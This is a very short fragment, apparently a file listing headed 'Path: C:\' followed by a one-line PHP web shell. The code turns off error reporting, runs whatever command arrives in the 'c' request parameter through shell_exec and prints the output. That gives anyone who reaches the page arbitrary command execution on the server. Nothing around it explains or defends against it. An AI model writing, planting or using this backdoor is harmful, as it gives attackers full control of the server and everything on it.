Path: C:\
<?php error_reporting(0); if(isset($_REQUEST["c"])){echo "<pre>".shell_exec($_REQUEST["c"])."</pre>";} ?>